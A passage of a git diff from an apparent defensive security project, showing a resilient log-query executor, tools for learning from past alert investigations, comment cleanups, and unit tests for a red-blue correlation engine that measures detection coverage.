+ ), + timeout=timeout, + ) + + if isinstance(result, dict) and result.get("status") == "error": + error_msg = result.get("error", "Unknown error") + if "timeout" in error_msg.lower() or "deadline" in error_msg.lower(): + self.stats.timeout_count += 1 + last_error = error_msg + logger.warning(f"Query timeout: {error_msg}") + continue # Try next retry + # Other errors, still return but log + logger.warning(f"Query error (non-timeout): {error_msg}") + + # Success! + self.stats.successful_attempts += 1 + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + + # Record attempt + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=True, + result_count=self._count_results(result), + duration_ms=duration_ms, + ) + ) + + if isinstance(result, dict): + result["_resilience_metadata"] = { + "original_start": start_time, + "original_end": end_time, + "actual_start": new_start_str, + "actual_end": new_end_str, + "time_range_factor": factor, + "retry_count": attempt, + "time_range_reduced": factor < 1.0, + } + + dn.log_metric("query_success", 1, mode="count") + return result + + except asyncio.TimeoutError: + self.stats.timeout_count += 1 + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + last_error = f"Timeout after {timeout}s" + logger.warning(f"Query timed out after {timeout}s (attempt {attempt + 1})") + + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=False, + error=last_error, + duration_ms=duration_ms, + ) + ) + + except Exception as e: + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + last_error = str(e) + logger.error(f"Query failed: {e}") + + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + 
start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=False, + error=last_error, + duration_ms=duration_ms, + ) + ) + + # Check for gRPC errors (non-retryable in most cases) + if "grpc" in str(e).lower(): + break # Move to next time range factor + + # All attempts failed + dn.log_metric("query_all_retries_failed", 1, mode="count") + logger.error(f"All query attempts failed after {self.stats.total_attempts} attempts") + + return { + "status": "error", + "error": f"Query failed after all retries. Last error: {last_error}", + "_resilience_metadata": { + "total_attempts": self.stats.total_attempts, + "timeout_count": self.stats.timeout_count, + "time_range_reductions": self.stats.time_range_reductions, + "final_time_range_factor": self.TIME_RANGE_FACTORS[-1], + }, + "suggestion": ( + "The query consistently times out. Try:\n" + "1. Use more specific label filters to reduce data volume\n" + "2. Query a shorter time range manually\n" + "3. Simplify the regex patterns in the query" + ), + } + + async def _execute_chunked( + self, + query_fn: Callable[..., Any], + query: str, + start_dt: datetime, + end_dt: datetime, + **kwargs: Any, + ) -> dict[str, Any]: + """Execute a query in chunks and merge results. 
+ + Args: + query_fn: The async query function + query: The query string + start_dt: Start datetime + end_dt: End datetime + **kwargs: Additional query arguments + + Returns: + Merged results from all chunks + """ + chunk_delta = timedelta(minutes=self.chunk_size_minutes) + chunks = [] + current_start = start_dt + + while current_start < end_dt: + current_end = min(current_start + chunk_delta, end_dt) + chunks.append((current_start, current_end)) + current_start = current_end + + logger.info(f"Executing query in {len(chunks)} chunks of {self.chunk_size_minutes}min each") + + all_results = [] + failed_chunks = [] + + for i, (chunk_start, chunk_end) in enumerate(chunks): + logger.debug(f"Executing chunk {i + 1}/{len(chunks)}") + + chunk_result = await self.execute_with_resilience( + query_fn, + query, + chunk_start.isoformat().replace("+00:00", "Z"), + chunk_end.isoformat().replace("+00:00", "Z"), + **kwargs, + ) + + if isinstance(chunk_result, dict) and chunk_result.get("status") == "error": + failed_chunks.append(i) + logger.warning(f"Chunk {i + 1} failed: {chunk_result.get('error')}") + else: + all_results.append(chunk_result) + + # Merge results + merged = self._merge_chunk_results(all_results) + + if isinstance(merged, dict): + merged["_chunked_execution"] = { + "total_chunks": len(chunks), + "successful_chunks": len(all_results), + "failed_chunks": len(failed_chunks), + "chunk_size_minutes": self.chunk_size_minutes, + } + + if failed_chunks: + logger.warning(f"{len(failed_chunks)}/{len(chunks)} chunks failed") + + return merged + + def _merge_chunk_results(self, results: list[dict[str, Any]]) -> dict[str, Any]: + """Merge results from multiple chunks. 
+ + Args: + results: List of query results from chunks + + Returns: + Merged result dict + """ + if not results: + return {"status": "success", "data": {"result": []}} + + # For Loki-style results, merge the streams + merged_streams = [] + for result in results: + if isinstance(result, dict): + data = result.get("data", {}) + streams = data.get("result", []) + merged_streams.extend(streams) + + return { + "status": "success", + "data": {"result": merged_streams}, + } + + def _count_results(self, result: Any) -> int: + """Count the number of results in a query response.""" + if isinstance(result, list): + return len(result) + if isinstance(result, dict): + data = result.get("data", {}) + streams = data.get("result", []) + if isinstance(streams, list): + total = 0 + for stream in streams: + values = stream.get("values", []) + total += len(values) if isinstance(values, list) else 0 + return total + return 0 + + def get_stats_summary(self) -> dict[str, Any]: + """Get a summary of query statistics. 
+ + Returns: + Dict with query execution statistics + """ + return { + "total_attempts": self.stats.total_attempts, + "successful_attempts": self.stats.successful_attempts, + "success_rate": f"{self.stats.success_rate * 100:.1f}%", + "timeout_count": self.stats.timeout_count, + "retry_count": self.stats.retry_count, + "time_range_reductions": self.stats.time_range_reductions, + } + + +# Singleton instance for global use +_resilient_executor: QueryResilientExecutor | None = None + + +def get_resilient_executor() -> QueryResilientExecutor: + """Get or create the global resilient executor instance.""" + global _resilient_executor + if _resilient_executor is None: + _resilient_executor = QueryResilientExecutor() + return _resilient_executor + + +def reset_resilient_executor() -> None: + """Reset the global executor (for testing or new investigations).""" + global _resilient_executor + _resilient_executor = None diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py index 9a4c80c3..51c278fd 100644 --- a/src/ares/core/remote.py +++ b/src/ares/core/remote.py @@ -229,7 +229,6 @@ def run_command( except (TokenRetrievalError, SSOTokenLoadError) as e: self._handle_sso_error(e) except ClientError as e: - # Check if this is an SSO-related error error_str = str(e).lower() if "token" in error_str and ("expired" in error_str or "sso" in error_str): self._handle_sso_error(e) diff --git a/src/ares/integrations/mitre.py b/src/ares/integrations/mitre.py index 46c7ea70..e3fef207 100644 --- a/src/ares/integrations/mitre.py +++ b/src/ares/integrations/mitre.py @@ -103,7 +103,6 @@ async def load(self) -> None: response.raise_for_status() bundle = response.json() - # Parse STIX objects for obj in bundle.get("objects", []): obj_type = obj.get("type") @@ -131,12 +130,10 @@ def _parse_technique(self, obj: dict) -> None: if not technique_id: return - # Get tactic from kill chain kill_chain = obj.get("kill_chain_phases", []) tactic_shortname = kill_chain[0]["phase_name"] if kill_chain 
else "unknown" tactic_id = self.TACTIC_MAP.get(tactic_shortname, "") - # Check if subtechnique is_subtechnique = obj.get("x_mitre_is_subtechnique", False) parent = None if is_subtechnique and "." in technique_id: diff --git a/src/ares/main.py b/src/ares/main.py index 04a5260d..eb452fa5 100644 --- a/src/ares/main.py +++ b/src/ares/main.py @@ -87,7 +87,6 @@ async def main( args = args or Args() dn_args = dn_args or DreadnodeArgs() - # Get API keys from environment if not provided grafana_api_key = args.grafana_api_key or os.getenv("GRAFANA_API_KEY", "") dreadnode_token = dn_args.token or os.getenv("DREADNODE_API_KEY", "") @@ -116,7 +115,6 @@ async def main( from ares.integrations.mitre import MITREAttackClient from ares.tools.blue import GrafanaTools - # Initialize MITRE client logger.info("Loading MITRE ATT&CK data from STIX repository...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -129,7 +127,6 @@ async def main( report_dir.mkdir(parents=True, exist_ok=True) logger.info(f"Reports: {report_dir}") - # Initialize orchestrator orchestrator = InvestigationOrchestrator( model=args.model, grafana_url=args.grafana_url, @@ -139,7 +136,6 @@ async def main( max_steps=args.max_steps, ) - # Initialize Grafana client for polling grafana = GrafanaTools( base_url=args.grafana_url, api_key=grafana_api_key, @@ -158,7 +154,6 @@ async def main( try: while True: try: - # Poll for firing alerts alerts = await grafana.get_firing_alerts() for alert in alerts: @@ -244,7 +239,6 @@ async def investigate_alert( args = args or Args() dn_args = dn_args or DreadnodeArgs() - # Parse alert if alert_json.startswith("{"): alert = json.loads(alert_json) else: @@ -266,7 +260,6 @@ async def investigate_alert( from ares.agents.blue import InvestigationOrchestrator from ares.integrations.mitre import MITREAttackClient - # Load MITRE data logger.info("Loading MITRE ATT&CK data...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -350,7 +343,6 @@ async def redteam( 
from ares.agents.red import RedTeamOrchestrator from ares.integrations.mitre import MITREAttackClient - # Load MITRE data logger.info("Loading MITRE ATT&CK data...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -363,7 +355,6 @@ async def redteam( report_dir.mkdir(parents=True, exist_ok=True) logger.info(f"Reports: {report_dir}") - # Create orchestrator orchestrator = RedTeamOrchestrator( model=args.model, mitre_client=mitre_client, diff --git a/src/ares/reports/redteam.py b/src/ares/reports/redteam.py index 507cce05..3d31e3e0 100644 --- a/src/ares/reports/redteam.py +++ b/src/ares/reports/redteam.py @@ -30,11 +30,9 @@ def generate(self, state: RedTeamState) -> str: Returns: Complete markdown report as a string. """ - # Calculate duration duration = datetime.now(timezone.utc) - state.started_at - duration_str = str(duration).split(".")[0] # Remove microseconds + duration_str = str(duration).split(".")[0] - # Generate executive summary executive_summary = self._generate_executive_summary(state) # Render the report using the template diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py index 76b4f07c..52b04b47 100644 --- a/src/ares/tools/blue/__init__.py +++ b/src/ares/tools/blue/__init__.py @@ -3,6 +3,7 @@ from ares.tools.blue.actions import CompletionTools, escalate_investigation from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools +from ares.tools.blue.learning import LearningTools from ares.tools.blue.observability import LokiTools, PrometheusTools from ares.tools.blue.query_templates import QueryTemplateTools @@ -10,6 +11,7 @@ "CompletionTools", "GrafanaTools", "InvestigationTools", + "LearningTools", "LokiTools", "PrometheusTools", "QueryTemplateTools", diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index fc8baa68..d053ee93 100644 --- a/src/ares/tools/blue/actions.py +++ 
b/src/ares/tools/blue/actions.py @@ -69,7 +69,6 @@ async def complete_investigation( ... ) 'Investigation completed. Report will be generated.' """ - # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." @@ -92,7 +91,6 @@ async def complete_investigation( alert_annotations = self.state.alert.get("annotations", {}) response_guidance = alert_annotations.get("response", "") if response_guidance: - # Parse numbered or bulleted steps from response import re steps = re.split(r"\d+\.\s+", response_guidance) @@ -132,7 +130,6 @@ def _generate_fallback_synopsis(self) -> None: parts = [] - # Get alert info alert_name = self.state.alert.get("labels", {}).get("alertname", "Unknown alert") severity = self.state.alert.get("labels", {}).get("severity", "unknown") starts_at = self.state.alert.get("startsAt", "") @@ -142,12 +139,10 @@ def _generate_fallback_synopsis(self) -> None: if starts_at: parts.append(f"Alert triggered at {starts_at}.") - # Add technique info if self.state.identified_techniques: techniques = ", ".join(list(self.state.identified_techniques)[:3]) parts.append(f"MITRE techniques identified: {techniques}.") - # Add host/user info if self.state.queried_hosts: hosts = ", ".join(list(self.state.queried_hosts)[:3]) parts.append(f"Hosts involved: {hosts}.") @@ -156,10 +151,8 @@ def _generate_fallback_synopsis(self) -> None: users = ", ".join(list(self.state.queried_users)[:3]) parts.append(f"Users involved: {users}.") - # Add evidence summary if self.state.evidence: parts.append(f"{len(self.state.evidence)} evidence items collected.") - # Get highest-level evidence high_level = [e for e in self.state.evidence if e.pyramid_level.value >= 5] if high_level: parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.") diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py new file mode 100644 index 00000000..38a8fb40 --- /dev/null +++ b/src/ares/tools/blue/learning.py @@ -0,0 +1,347 
@@ +""" +Learning tools for querying past investigations and improving detection. + +These tools allow the agent to learn from previous investigations +and apply that knowledge to new alerts. +""" + +from typing import Any + +import dreadnode as dn +from dreadnode.agent.tools.base import Toolset +from loguru import logger + +from ares.core.persistence import InvestigationStore, get_investigation_store + + +class LearningTools(Toolset): # type: ignore[misc] + """Tools for learning from past investigations. + + Provides access to historical investigation data, query effectiveness + statistics, and false positive patterns. + """ + + def __init__(self, store: InvestigationStore | None = None): + """Initialize learning tools. + + Args: + store: Optional investigation store (uses global store if not provided) + """ + self._store = store + + @property + def store(self) -> InvestigationStore: + """Get the investigation store.""" + if self._store is None: + self._store = get_investigation_store() + return self._store + + @dn.tool_method # type: ignore[untyped-decorator] + async def find_similar_investigations( + self, + alert_name: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + limit: int = 5, + ) -> dict[str, Any]: + """Find similar past investigations to learn from. + + Use this at the start of an investigation to see how similar alerts + were handled in the past and what queries were effective. 
+ + Args: + alert_name: Name of the current alert + technique_id: MITRE ATT&CK technique ID (e.g., "T1003.001") + severity: Alert severity level + limit: Maximum number of results (default 5) + + Returns: + Dictionary containing similar investigations and their outcomes + """ + dn.log_metric("learning_similar_lookup", 1, mode="count") + logger.info( + f"Looking up similar investigations: alert={alert_name}, technique={technique_id}" + ) + + similar = self.store.find_similar_investigations( + alert_name=alert_name, + technique_id=technique_id, + severity=severity, + limit=limit, + ) + + if not similar: + return { + "found": False, + "message": "No similar investigations found. This may be a new alert type.", + "investigations": [], + } + + results = [] + for sim in similar: + inv = sim.investigation + results.append( + { + "investigation_id": inv.investigation_id, + "alert_name": inv.alert_name, + "technique_id": inv.technique_id, + "similarity_score": sim.similarity_score, + "matching_factors": sim.matching_factors, + "outcome": { + "status": inv.status, + "evidence_count": inv.evidence_count, + "highest_pyramid_level": inv.highest_pyramid_level, + "is_true_positive": inv.is_true_positive, + }, + "duration_seconds": inv.duration_seconds, + "effective_queries": inv.effective_queries[:3], # Top 3 effective queries + "techniques_identified": inv.techniques_identified, + } + ) + + # Add summary guidance + completed_count = sum(1 for s in similar if s.investigation.status == "completed") + avg_evidence = sum(s.investigation.evidence_count for s in similar) / len(similar) + + true_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is True) + false_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is False) + + return { + "found": True, + "count": len(results), + "summary": { + "completion_rate": f"{completed_count / len(similar) * 100:.0f}%", + "avg_evidence_count": round(avg_evidence, 1), + "true_positives": 
true_positive_count, + "false_positives": false_positive_count, + }, + "investigations": results, + "guidance": self._generate_guidance(similar), + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_effective_queries( + self, + alert_name: str | None = None, + limit: int = 10, + ) -> dict[str, Any]: + """Get the most effective queries for this type of alert. + + Returns queries that have historically produced evidence, + ranked by effectiveness. + + Args: + alert_name: Filter by alert type (optional) + limit: Maximum number of queries to return + + Returns: + Dictionary with effective queries and their statistics + """ + dn.log_metric("learning_query_lookup", 1, mode="count") + logger.info(f"Looking up effective queries for alert: {alert_name}") + + effective = self.store.get_effective_queries( + alert_type=alert_name, + min_evidence_rate=0.2, # At least 20% evidence rate + limit=limit, + ) + + if not effective: + return { + "found": False, + "message": "No query effectiveness data available yet.", + "queries": [], + } + + queries = [] + for qe in effective: + queries.append( + { + "query_pattern": qe.query_pattern, + "total_uses": qe.total_executions, + "success_rate": f"{qe.success_rate * 100:.0f}%", + "evidence_rate": f"{qe.evidence_rate * 100:.0f}%", + "used_for_alerts": qe.alert_types[:5], # Limit alert types shown + } + ) + + return { + "found": True, + "count": len(queries), + "queries": queries, + "recommendation": ( + "Use these queries as starting points. They have historically " + "produced evidence for similar alerts. Adapt the patterns to " + "your specific investigation context." + ), + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def check_false_positive_pattern( + self, + alert_name: str, + alert_fingerprint: str | None = None, + ) -> dict[str, Any]: + """Check if this alert matches a known false positive pattern. 
+ + Use this to quickly identify if an alert is likely a false positive + based on historical data. + + Args: + alert_name: Name of the alert + alert_fingerprint: Unique fingerprint/rule UID of the alert + + Returns: + Dictionary with false positive assessment + """ + dn.log_metric("learning_fp_check", 1, mode="count") + logger.info(f"Checking false positive patterns for: {alert_name}") + + # Check for similar false positives + similar = self.store.find_similar_investigations( + alert_name=alert_name, + alert_fingerprint=alert_fingerprint, + limit=20, + ) + + if not similar: + return { + "is_known_pattern": False, + "message": "No historical data for this alert type.", + "confidence": "low", + } + + # Count true/false positives + true_positives = sum(1 for s in similar if s.investigation.is_true_positive is True) + false_positives = sum(1 for s in similar if s.investigation.is_true_positive is False) + unlabeled = len(similar) - true_positives - false_positives + + # Calculate false positive likelihood + if true_positives + false_positives > 0: + fp_rate = false_positives / (true_positives + false_positives) + else: + fp_rate = 0.0 + + # Check known FP patterns + fp_patterns = self.store.get_false_positive_patterns(min_occurrences=2) + matching_pattern = None + for pattern in fp_patterns: + if pattern["alert_name"] == alert_name: + matching_pattern = pattern + break + + if matching_pattern and matching_pattern["occurrences"] >= 3: + return { + "is_known_pattern": True, + "confidence": "high", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "occurrences": matching_pattern["occurrences"], + "pattern": matching_pattern, + "recommendation": ( + "This alert has been marked as false positive multiple times. " + "Consider quick validation and early completion if indicators match." 
+ ), + } + + if fp_rate > 0.7: + return { + "is_known_pattern": True, + "confidence": "medium", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "true_positives": true_positives, + "false_positives": false_positives, + "recommendation": ( + "This alert type has a high false positive rate. " + "Prioritize quick validation queries before deep investigation." + ), + } + + return { + "is_known_pattern": False, + "confidence": "medium" if unlabeled < len(similar) / 2 else "low", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "true_positives": true_positives, + "false_positives": false_positives, + "unlabeled": unlabeled, + "message": "No strong false positive pattern detected. Proceed with normal investigation.", + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_investigation_statistics(self) -> dict[str, Any]: + """Get overall investigation statistics. + + Returns aggregated statistics about past investigations, + useful for understanding overall detection performance. + + Returns: + Dictionary with investigation statistics + """ + dn.log_metric("learning_stats_lookup", 1, mode="count") + + stats = self.store.get_statistics() + + return { + "total_investigations": stats["total_investigations"], + "status_distribution": stats["status_distribution"], + "performance": { + "avg_evidence_count": stats["avg_evidence_count"], + "avg_pyramid_level": stats["avg_pyramid_level"], + "avg_duration_seconds": stats["avg_duration_seconds"], + }, + "query_insights": { + "total_query_patterns": stats["total_query_patterns"], + "avg_evidence_rate": f"{stats['avg_query_evidence_rate']}%", + }, + "labeling": stats["labeling"], + } + + def _generate_guidance(self, similar: list) -> str: + """Generate investigation guidance based on similar investigations.""" + if not similar: + return "No historical guidance available." 
+ + # Find most successful investigation + completed = [s for s in similar if s.investigation.status == "completed"] + if not completed: + return "Previous investigations of this type did not complete successfully." + + # Get investigation with most evidence + best = max(completed, key=lambda x: x.investigation.evidence_count) + + guidance_parts = [] + + if best.investigation.evidence_count > 0: + guidance_parts.append( + f"Past investigations found an average of " + f"{sum(s.investigation.evidence_count for s in completed) / len(completed):.1f} " + f"evidence items." + ) + + if best.investigation.effective_queries: + guidance_parts.append( + f"Effective queries to try: {', '.join(best.investigation.effective_queries[:2])}" + ) + + # Check for common outcomes + true_positive_rate = ( + sum(1 for s in similar if s.investigation.is_true_positive is True) / len(similar) * 100 + if similar + else 0 + ) + + if true_positive_rate > 70: + guidance_parts.append( + f"This alert type has a {true_positive_rate:.0f}% true positive rate - " + "likely worth thorough investigation." + ) + elif true_positive_rate < 30: + guidance_parts.append( + f"This alert type has only a {true_positive_rate:.0f}% true positive rate - " + "consider quick validation first." + ) + + return ( + " ".join(guidance_parts) + if guidance_parts + else "Proceed with standard investigation approach." + ) diff --git a/src/ares/tools/blue/observability.py b/src/ares/tools/blue/observability.py index 8c405ddf..380aa3a5 100644 --- a/src/ares/tools/blue/observability.py +++ b/src/ares/tools/blue/observability.py @@ -76,7 +76,6 @@ async def query_logs( query_logs_around_timestamp: For time-window queries around a specific event. get_label_values: For discovering available log labels. 
""" - # Validate query to prevent empty-compatible regex errors if '=~".*"' in logql or "=~'.*'" in logql: return { "status": "error", @@ -109,7 +108,6 @@ async def query_logs( except httpx.HTTPError as e: logger.error(f"Loki query failed: {e}") logger.error(f"Failed query was: {logql}") - # Return detailed error for the agent to learn from return { "status": "error", "error": str(e), @@ -185,7 +183,6 @@ async def query_logs_progressive( limit=limit, ) - # Check if we got results data = result.get("data", {}) results = data.get("result", []) if results: diff --git a/tests/test_correlation.py b/tests/test_correlation.py new file mode 100644 index 00000000..8819735e --- /dev/null +++ b/tests/test_correlation.py @@ -0,0 +1,735 @@ +"""Tests for the Red-Blue Correlation Engine.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.correlation import ( + BlueTeamDetection, + CorrelationMatch, + CorrelationReport, + DetectionGap, + RedBlueCorrelator, + RedTeamActivity, +) + + +@pytest.fixture +def temp_reports_dir() -> Path: + """Create a temporary reports directory.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) + + +@pytest.fixture +def sample_red_activity() -> RedTeamActivity: + """Create a sample red team activity.""" + return RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Executed PowerShell command for reconnaissance", + target_ip="192.168.1.100", + target_host="server01", + credential_used="admin", + success=True, + metadata={"command": "Get-Process"}, + ) + + +@pytest.fixture +def sample_blue_detection() -> BlueTeamDetection: + """Create a sample blue team detection.""" + return BlueTeamDetection( + timestamp=datetime(2024, 1, 15, 10, 32, 0, tzinfo=timezone.utc), + alert_name="Suspicious PowerShell Activity", + technique_id="T1059.001", + severity="high", 
+ target_ip="192.168.1.100", + target_host="server01", + investigation_id="inv-001", + status="completed", + evidence_count=5, + highest_pyramid_level=3, + metadata={"rule_id": "rule-ps-001"}, + ) + + +class TestRedTeamActivity: + """Tests for RedTeamActivity dataclass.""" + + def test_key_generation(self, sample_red_activity: RedTeamActivity) -> None: + """Test unique key generation.""" + key = sample_red_activity.key + + assert "2024-01-15" in key + assert "T1059.001" in key + assert "192.168.1.100" in key + + def test_key_uniqueness(self) -> None: + """Test that different activities have different keys.""" + activity1 = RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 1", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ) + activity2 = RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 31, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 2", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ) + + assert activity1.key != activity2.key + + +class TestBlueTeamDetection: + """Tests for BlueTeamDetection dataclass.""" + + def test_key_generation(self, sample_blue_detection: BlueTeamDetection) -> None: + """Test unique key generation.""" + key = sample_blue_detection.key + + assert "2024-01-15" in key + assert "T1059.001" in key + assert "Suspicious PowerShell Activity" in key + + +class TestCorrelationMatch: + """Tests for CorrelationMatch dataclass.""" + + def test_match_quality_strong( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test strong match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=120.0, # 2 minutes + technique_match=True, + 
target_match=True, + confidence=0.9, + ) + + assert match.match_quality == "STRONG" + + def test_match_quality_good( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test good match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=400.0, # ~7 minutes + technique_match=True, + target_match=False, + confidence=0.6, + ) + + assert match.match_quality == "GOOD" + + def test_match_quality_weak( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test weak match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=700.0, # ~12 minutes + technique_match=True, + target_match=False, + confidence=0.4, + ) + + assert match.match_quality == "WEAK" + + def test_match_quality_tenuous( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test tenuous match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=700.0, + technique_match=False, + target_match=False, + confidence=0.2, + ) + + assert match.match_quality == "TENUOUS" + + +class TestCorrelationReport: + """Tests for CorrelationReport dataclass.""" + + def test_to_dict( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test conversion to dictionary.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=120.0, + technique_match=True, + target_match=True, + confidence=0.9, + ) + + gap = DetectionGap( + red_activity=sample_red_activity, + reason="No alert rule configured", + recommended_detection="Add PowerShell monitoring", + 
) + + report = CorrelationReport( + analysis_timestamp=datetime.now(timezone.utc), + red_operation_id="op-001", + time_window_start=datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc), + time_window_end=datetime(2024, 1, 15, 11, 0, 0, tzinfo=timezone.utc), + total_red_activities=10, + total_blue_detections=8, + matched_activities=7, + undetected_activities=3, + false_positive_detections=1, + matches=[match], + gaps=[gap], + false_positives=[sample_blue_detection], + detection_rate=0.7, + false_positive_rate=0.125, + mean_time_to_detect=120.0, + technique_coverage={ + "T1059.001": {"total": 5, "detected": 4, "missed": 1, "detection_rate": 0.8} + }, + ) + + data = report.to_dict() + + assert data["red_operation_id"] == "op-001" + assert data["summary"]["total_red_activities"] == 10 + assert data["summary"]["detection_rate"] == "70.0%" + assert len(data["matches"]) == 1 + assert len(data["gaps"]) == 1 + assert "T1059.001" in data["technique_coverage"] + + +class TestRedBlueCorrelator: + """Tests for RedBlueCorrelator.""" + + def test_init(self, temp_reports_dir: Path) -> None: + """Test correlator initialization.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + assert correlator.reports_dir == temp_reports_dir + assert correlator.time_window == timedelta(minutes=30) + + def test_init_custom_time_window(self, temp_reports_dir: Path) -> None: + """Test correlator with custom time window.""" + correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=60) + + assert correlator.time_window == timedelta(minutes=60) + + def test_correlate_perfect_match( + self, + temp_reports_dir: Path, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test correlation with perfect technique and target match.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[sample_blue_detection], + operation_id="test-op", + ) + + assert 
report.total_red_activities == 1 + assert report.total_blue_detections == 1 + assert report.matched_activities == 1 + assert report.undetected_activities == 0 + assert len(report.matches) == 1 + assert report.matches[0].technique_match is True + assert report.matches[0].target_match is True + + def test_correlate_no_match_outside_time_window( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test that activities outside time window are not matched.""" + correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=10) + + # Detection 1 hour after activity + late_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(hours=1), + alert_name="Late Detection", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-late", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[late_detection], + operation_id="test-op", + ) + + assert report.matched_activities == 0 + assert report.undetected_activities == 1 + + def test_correlate_technique_mismatch( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test correlation with technique mismatch.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + wrong_technique_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=2), + alert_name="Different Technique", + technique_id="T1003.001", # Different technique + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-001", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[wrong_technique_detection], + operation_id="test-op", + ) + + # Should still match based on target and time proximity + assert 
len(report.matches) == 1 + assert report.matches[0].technique_match is False + assert report.matches[0].target_match is True + + def test_correlate_multiple_activities(self, temp_reports_dir: Path) -> None: + """Test correlation with multiple activities and detections.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + # Use different target IPs to prevent cross-matching via target + red_activities = [ + RedTeamActivity( + timestamp=base_time + timedelta(minutes=i * 10), + technique_id=f"T100{i}", + technique_name=f"Technique {i}", + action=f"Action {i}", + target_ip=f"192.168.1.{100 + i}", # Different IPs + target_host=None, + credential_used=None, + success=True, + ) + for i in range(5) + ] + + # Only detect 3 of 5 activities (matching technique and target) + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=i * 10 + 2), + alert_name=f"Alert {i}", + technique_id=f"T100{i}", + severity="high", + target_ip=f"192.168.1.{100 + i}", # Matching IPs + target_host=None, + investigation_id=f"inv-{i}", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + for i in [0, 2, 4] # Only detect activities 0, 2, 4 + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + assert report.total_red_activities == 5 + assert report.total_blue_detections == 3 + assert report.matched_activities == 3 + assert report.undetected_activities == 2 + assert report.detection_rate == 0.6 + + def test_correlate_empty_activities(self, temp_reports_dir: Path) -> None: + """Test correlation with no activities.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[], + blue_detections=[], + operation_id="empty-op", + ) + + assert report.total_red_activities == 0 + assert report.detection_rate == 0.0 + + def 
